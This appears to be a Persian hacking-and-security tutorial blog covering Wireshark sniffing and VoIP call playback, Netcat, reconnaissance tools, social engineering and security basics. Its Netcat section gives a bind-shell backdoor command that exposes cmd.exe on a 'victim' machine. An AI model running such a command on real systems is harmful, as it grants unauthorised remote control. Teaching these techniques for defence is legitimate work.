شنود در شبکه

واژه ی Sniff در واقع به معنای بو کشیدن است اما در شبکه به معنای شنود استفاده شده است.

یکی از روش های جمع آوری اطلاعات در شبکه شنود است.

شنود بر دو قسم است:

1- شنود فعال (Active sniff)

2- شنود غیر فعال (Passive sniff)


شنود فعال با استفاده از ابزار هایی نظیر cain انجام میگردد و قابل رد گیری است.

شنود غیر فعال یعنی این که لینکی به شبکه داشته باشیم و از طریق آن و قرار دادن کارت شبکه در حالت بی قید کلیه پکت های عبوری از داخل شبکه را رصد نماییم.

یکی از ابزارهای مفید در این زمینه Wireshark نام دارد. این ابزار برای رصد پکت های شبکه به کار میرود و کاربرد های مثبت بسیاری در زمینه عیب یابی شبکه و کشف حلمه و ... نیز دارد و به خاطر همین قابلیت های زیادی که دارد یکی از ابزار های دست هکر ها نیز به شمار میرود و شما به عنوان متخصص ضد هک باید با آن آشنا باشید.

وقتی برنامه را نصب کردید و آن را اجرا کردید صفحه ای مشابه صفحه زیر خواهید دید که با کلیک کردن بر روی نام  کارت شبکه خود ، رصد شروع خواهد شد.

 

و صفحه به شکل زیر تغییر خواهد کرد.

در این شکل مشاهده میکنید که انواع و اقسام پکت ها در حال عبور هستند که میتوان مبدا ، مقصد ، نوع بسته و محتوای آن را بررسی نمود.

و به این روش میتوان پکت های شبکه را شنود کرد . همچنین شنود ارتباطات VoIP هم با استفاده از یک sniffer، مثل بقیه انواع ترافیک شبکه قابل انجام است. برای تست شنود  مکالمات تلفنی که در بستر اینترنت با استفاده از سرویس Voice over IP در حال عبور است را با این ابزار شنود کرد:


1- نصب Wireshark

2- دانلود نمونه ترافیک حاوی VoIP از سایت Wireshark

3- اجرای Wireshark و باز کردن نمونه فایل فوق

4- انتخاب گزینه Voice Calls از منوی Telephony 

لیستی از تماس ها نشان داده می شود. در این مثال فقط اولین تماس حاوی مکالمه است.

5- اولین تماس را انتخاب و دکمه Player و بعد Decode را بزنید.

6- دو نمودار امواج صوتی مربوط به مکالمه (هر کدام برای یک طرف مکالمه) نشان داده می شود. با انتخاب check box زیر هر نمودار و زدن دکمه Play ، مکالمه مربوط به آن پخش میشود.

NetCat یا چاقوی همه کاره ی سوئیسی

NetCat چیست؟

حتمن میدونید که در دنیا چاقو های همه کاره ی سوئیسی خیلی معروف هستند.

در دنیای شبکه هم از این چاقو ها وجود داره!

اما اسم این ابزار همه کاره Netcat هست

این ابزار هم از ابزار های جمع آوری اطلاعات هست و هم از ابزار های ارتقای سطح دسترسی

نت کت بر اساس یک نظر سنجی که در سایت insecure.org منتشر شد به عنوان دومین ابزار پرکاربرد هک انتخاب شده است.

فایل اجرایی این برنامه nc.exe میباشد. این فایل را در مسیر ویندوز کپی نموده و شروع به کار میکنیم.

nc -vvvlp 1000 دستور شروع به کار ابزار نت کت برای گوش دادن (Listening)

v = verbal یعنی گزارش دادن هر اتفاقی که می افتد

l = یعنی Listen

p = port number


NC -vvv 192.168.100.128 1000 برای وصل شدن به سیستم طرف مقابل با این دستور و آی پی 


مثال بک دور :

روی سیستم قربانی

nc -vvvlp 1000 -e cmd.exe

روی سیستم خودمان

nc -vvv 192.168.100.128 1000

به محض اجرای این دستور کامند پرامپت سیستم قربانی برای ما باز میشود

خوب اگر میخواهید با این ابزار آشنا بشید زحمت بکشید و این فایل را از اینجا دانلود کنید و بخوانید.

 

روش های جمع آوری اطلاعات

خوب!

داشتیم میگفتیم که حواستان باشه که تخلیه تلفنی نشوید...

اما تخلیه اطلاعاتی همیشه تلفنی نیست.. گاهی از طریق اطلاعاتی که شما در وب سایت تان قرار داده اید ممکن است هک شوید.

یا حتی با استفاده از سرویس های عمومی و رایگان و قانونی که روی اینترنت وجود دارد ممکن است اطلاعات شما دست آدم های نا باب بیافتد.

مثلا ساده ترین شکلش who is است .

شما وقتی یک دامنه ثبت میکنید اطلاعاتی در اختیار nic قرار میدهید که معمولا اطلاعات واقعی هست

به خصوص موقع ثبت دامنه های دات آی آر که دیگه خدا به داد برسه .. شماره کد پستی و شماره ملی و سایز کفش و... را هم ممکنه بپرسن!!

این اطلاعات ممکن است در آینده بر علیه شما استفاده شود توسط هکر ها.

پس لزوما دلیلی ندارد به خصوص در ثبت دامنه های غیر آی آر اطلاعات درستی ثبت کنید.

و نکته دیگر این که شما با عضو شدن در شبکه های اجتماعی گاها از عکس و نام واقعی خود استفاده میکنید که این خودش کار مهندسی اجتماعی را آسان کرده است.

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

تاریخ تولد ، نام اعضای خانواده ، آدرس و تلفن ، آدرس ایمیل و ... اطلاعاتی است که این روزهای ساده تر به دست می آید.

نکته : 

اطلاعات خود را دو دستی تقدیم نکنید!

آشنایی با برخی از ابزار های جمع آوری اطلاعات:

وقتی میخواهند یک سایت را هک کنند اول باید اطلاعاتی در مورد آن سایت جمع آوری کرد:

سایت up است یا نه

سایت کجا میزبانی میشود

سرور dns  سایت

نام گردانندگان سایت

نوع سیستم عامل سرور و ورژن آن

پورت های باز سرور

انتخاب ابزار مناسب با اطلاعات به دست آمده

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

ابزار whois

برای این که بفهمیم این سایت را چه کسی ثبت کرده از این ابزار استفاده میکنیم.

مثلا برای این که بفهمیم سایت www.mjb.ir را چه کسی ثبت کرده ، کافیست به سایت nic.ir بروید و با استفاده از سرویس Whois  و وارد کردن نام سایت و پسوند آن (mjb.ir) نام و مشخصات ثبت کننده را مشاهده نمایید.

یا مثلا برای این که بفهمیم دامنه mjb.com متعلق به چه کسی است میتوانیم به یکی از سایت های whois برویم ( مثلا whois.com) و در مورد آن جستجو کنیم.

 

و در خروجی متن زیر را مشاهده مینماییم:

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

 

مهندسی اجتماعی حفره ای که پچ نمیشود!!!

در بخش های قبلی مراحل هک را که گفتیم اولین مرحله آن جمع آوری اطلاعات بود

در مورد جمع آوری اطلاعات روش ها و ابزار های زیادی ، از کندوکاو در سطل زباله گرفته تا پرس و جو و استفاده از ابزار های پیشرفته تا مهندسی اجتماعی...


اما مهندسی اجتماعی..

روشی برای جمع آوری اطلاعات است که به زبان خودمانی میشود مخ زنی

«مهندسی اجتماعی هنر بهره برداری از رفتارهای آسیب پذیر انسان‌ها برای ایجاد شکاف امنیتی بدون هیچ ظن و گمانی از سوی قربانی است.»

در راهنمای مطالعه CISSP، مهندسی اجتماعی به این صورت تعریف شده‌است: «مهارتی است که به وسیله شخصی مجهول، برای بدست آوردن اعتماد افراد درون سازمان و تشویق آنها برای ایجاد تغییرات دلخواه در سیستم‌های IT و در جهت دستیابی به حق دسترسی استفاده می‌شود.» در نسخه انگلسیی زبان ویکی‌پدیا، مهندسی اجتماعی به این صورت تعریف شده‌است: :«مهندسی اجتماعی، تکنیک بدست آوردن اطلاعات محرمانه به وسیله تحریک کاربران مجازاست.» به نقل از ویکیپدیا


یک مهندس اجتماعی موفق اول باید روابط عمومی خوبی داشته باشد. اولین نگاه ، اولین برخورد و اولین سلام عموما تاثیر گذار ترین آن هاست.

به عنوان مثال زمانی که شما میخواهید نام کاربری یک نفر را حدس بزنید باید با روحیات و علایق آن فرد آشنا باشید ( تا حدودی) نام اعضای خانواده او را بدانید .. شماره شناسنامه ، تاریخ تولد خود و سایر اعضای خانواده اش را حتی الامکان بدانید. این ممکن است برای شما کمک کننده باشد. هرچند الان تا حدودی فرهنگ سازی در این زمینه شروع شده و مردم خوشبختانه بسیار آگاهانه تر از قبل عمل میکنند. قبلا من جایی پروژه داشتم که کارمند اونجا کلمه عبورش که عدد 1 بود را برای این که فراموش نکند نوشته بود و زیر شیشه میزش گذاشته بود!!

نوع دیگر از کاربرد های این مهندسی مثلا در برخورد با تکنسین های ساپورت میباشد (Help Desk)

مثلا فردی تماس میگیرد با یخش فنی و میگوید از دفتر مدیر عامل تماس گرفته و آقای مدیر به شدت عصبی هستند و با سیستم میخواهند یک ایمیل بفرستند و از قضا کلمه عبورشان را هم فراموش کرده اند لطفا سریع کلمه عبور ایشان را ریست نمایید... چه اتفاقی می افتد؟ کارمند در به در این کار را سریع انجام میدهد و هکر خوشوقت خیلی سریع با یوزر آقای مدیر کل که تمام دسترسی ها را هم دارد لاگین کرده و پس از یک تفریح حسابی در شبکه شما بدون هیچ رد پایی میزند به چاک. 

در اینجا دو اشکال وجود دارد:

1- قانون Least Privilege رعایت نشده بود برای یوزر آن مدیر محترم. بعضی وقت ها از ترسمان از یک مدیر تمام دسترسی ها را به یوزر او میدهیم و این کار اکثرا لزومی ندارد.

2- روال درستی در سازمان برای ریست کردن پسورد وجود ندارد یا به درستی اجرا نمیشود.  این که من صدای یک مدیر را تقلید کنم و با عصبانیت از یک help desk بخواهم یوزرم را ریست کند وگر نه اخراجش میکنم باید اتفاقا آن helpdesk  را مصمم تر برای اجرای دستورالعمل نماید و محترمانه به آن شخص (ولو خود آن مدیر محترم هم باشد واقعا) بگویم عذر میخواهم شما باید برای انجام این کار این روال را انجام دهید. 

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

همیشه هوشیار باشید:

به خصوص در مورد تخلیه تلفنی اطلاعات ، همیشه به فرد پشت خط مضنون باشید.


مهندسین اجتماعی خبره تر حتی به تخلیه تلفنی هم اکتفا نمیکنند و حتی با شخص رو در رو میشوند. مثلا فرض کنید در فرودگاه کسی که چمدان شما را از روی ظاهرا انسان دوستی کمک شما حمل میکند و در پایان خود را با یک کارت ویزیت قلابی معرفی میکند و از شما هم کارت میگیرد ، ماه هاست که شما را زیر نظر داشته و به دنبال موقعیتی برای ورود به زندگی شما و رفاقت و در نهایت قربانی کردن شماست. 

یا شاید یک دوستی که مثلا از یک تصادف ساده شروع میشود و بعد طرف با اصرار شماره شما را برای پرداخت خسارت گرفته و بعد قراری و بعد دوستی و بعد به مرور اعتماد و بعد خدا میداند...

به خصوص این موارد در خارج از کشور ممکن است برای افراد به ویژه متخصصان اتفاق بیافتد و شخص ناخواسته اطلاعاتی را در اختیار فردی قرار دهد که حتی تصورش را نمیتواند بکند.

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


برای آشنایی بیشتر و آمادگی برای مقابله با روش ها کتابی را به نام هنر فریب قرار داده ام که پیشنهاد میکنم برای جلوگیری از قربانی شدن حتما مطالعه نمایید. این کتاب نوشته کوین میتنیک است و به زبان اصلی. اگر کسی  از دوستان ترجمه فارسی این کتاب را پیدا کرد معرفی کند تا برای دوستان قرار دهیم. بازهم تاکید میکنم هدف ما در اینجا بیان روش ها جهت بالا بردن دانش افراد و جلوگیری از قربانی شدن افراد است. مسئولیت نوع استفاده از روش ها به عهده ی استفاده کننده است.

امیدوارم به درجه ای از دانش و اعتقاد برسیم که هیچ وقت برای کسی بد نخواهیم... آمین

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

هک چیست؟

هک چیست؟ 

"رخنه کردن[۱] یا هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است. و کرک نیز به معنی رمزگشایی است و کراکر به فرد گشاینده رمز می‌گویند.

گستردگی واژهٔ هک منحصر به رایانه نمی‌باشد و توسط افراد با تخصص‌های گوناگون در زمینه‌هایی از قبیل موسیقی، نقاشی و... نیز به کار می‌رود که به معنی دگرگونی‌های هوشمندانه و خلاقانه فرد در آن زمینه می‌باشد." نقل از ویکی پدیا

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

بنابر این لزوما نباید هک را به آن معنای سیاه  تصور کنیم . بلکه آن کراک کردن است که معنای قفل شکستن و خسارت زدن و ... دارد. هک یک کار علمی و هنری و خلاقانه است در جهت کمک به انسانیت...

معمولا مراحل هک به این شرح است:

1- جمع آوری اطلاعات

2- شناسایی مقدماتی

3- جمع آوری ابزار لازم

4- حمله

5- تثبیت موقعیت و ارتقای دسترسی

6- پوشاندن رد پا


برخی ابزار های مورد استفاده برای جمع آوری اطلاعات:

nslookup

Tracert

MTR linux

ping

nmap

whois

dig

telnet

whatismyip.com

netcraft.com

packetstormsecurity.com

msf

exploit_db.com

milw0rm.com

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


در بخش های بعدی ابتدا هریک از مراحل فوق را توضیح میدهیم سپس شروع به کار با ابزار های فوق به عنوان کار عملی میکنیم

در اینجا ما قصد آموزش هک نداریم. تنها روش های هک را میگوییم و راه مقابله با آن را به ادمین ها یاد میدهیم.

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


آشنایی با امنیت - 2

امنیت سه رکن اصلی دارد:

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

Availability: داده ها باید همیشه در دسترس افراد مجاز باشد اگر هر عاملی باعث شود که داده ها در دسترس افراد مجاز نباشد، یکی از ارکان مثلث امنیت از بین رفته است . مثلا اگر داده های بانک از دسترس کارمند بانک خارج شود آن کارمند بی چاره چگونه میتواند پاسخگوی صف طویل و عصبانی ارباب رجوع از خود راضی باشد!!

Integrity: جامعیت داده ها باید حفظ شود. یک داده ی نصفه نیمه به هیچ دردی نمیخورد. مثلا اگر یک نامه وسط راه باز شود و یکی از خطوط آن پاک شود آیا دستوراتی که در آن نامه است توسط گیرنده به درستی انجام میشود؟ یا حتی اگر خطی به آن نامه اضافه شود آیا آن نامه دیگر همان نامه ای است که فرستنده ارسال کرده؟

Confidentiality: محرمانگی داده ها همواره باید حفظ شود. قرار نیست همه از داده ها به یک سهم برخوردار شوند. مدیر امور مالی شرکت داده هایی را مجاز است ببیند که کارمند عادی امور اداری حق دیدن آن ها ندارد. همچنین کل این داده ها باید از چشم نامحرمان خارج سازمان مصون بماند.

بدیهی است هریک از این ارکان این مثلث که خللی در آن وارد شود کل امنیت به مخاطره می افتد.

 

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

آشنایی با امنیت - 1

اولین گام در برقراری امنیت ، امنیت فیزیکی است.

شما در ابتدا باید مراقب باشید کسی وارد محدوده ی ممنوعه شما نشود. مثلا دیتا سنتر

در ادارات دولتی و شرکت هایی که ارباب رجوع مراجعه میکند توجه به امنیت فیزیکی مهم است چون ممکن است دسترسی غیر مجاز ایجاد شود.

مثلا در سالن انتظار شما ممکن است یک نود شبکه در دسترسی ارباب رجوع باشد. یا سیستم وایرلس شما ممکن است امن نباشد و هرکس بتواند با استفاده از لپ تاب خود به شبکه شما وارد شود.

اگر قرار است به مراجعین خود اینترنت رایگان بدهید و یک اکسس پوینت میگذارید که همه به آن بتوانند وصل شوند ، نباید از طرفی آن اکسس پوینت داخل شبکه ی شما باشد.

2- دومین گام این است که دارایی های سازمان را طبقه بندی کنید و بر اساس ارزش آنها برای آن روال حفاظتی تهیه کنید. هزینه ای که در اثر لو رفتن آن اطلاعات به سازمان وارد میشود چقدر است؟ جواب این سوال در تعیین ارزش هر دارایی یا اطلاعات موثر است.

3- آموزش پرسنل: یادتان باشد همه ی اتفاقات بدی که در شبکه می افتد در اثر نفوذ و خرابکاری از بیرون نیست. برخی از آنها سهل انگاری پرسنل نا آگاه خودمان است که فرصت به دست فرصت طلبان داده است.

در دادن دسترسی به پرسنل بذل و بخشش نکنید. 

توجه کنید:

 چه کسی چه میزان دسترسی و تا چه زمانی 

لازم دارد. 

همان قدر به او دسترسی بدهید.

قانون Least Privilage:

کمترین دسترسی ممکن را به هر کاربر بدهید


همچنین هیچ وقت تمام دارایی تان را پشت یک قفل قرار ندهید.

اولا که در جاهای مختلف قرار دهید. یعنی بک آپ که میگیرید در کمد های مختلف یا اطاق های مختلف یا حتی در شهر های مختلف قرار دهید. ( بسته به اهمیت مرکز یا سازمان)

دوما یک قفل راحت تر شکسته میشود تا 3 قفل.

امنیت خود را لایه بندی کنید . مثلا از دو فایروال استفاده کنید . یا ترکیبی کنید.


قانون Defence in Dept:

دفاع در عمق یعنی ساختار امنیتی چند لایه

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir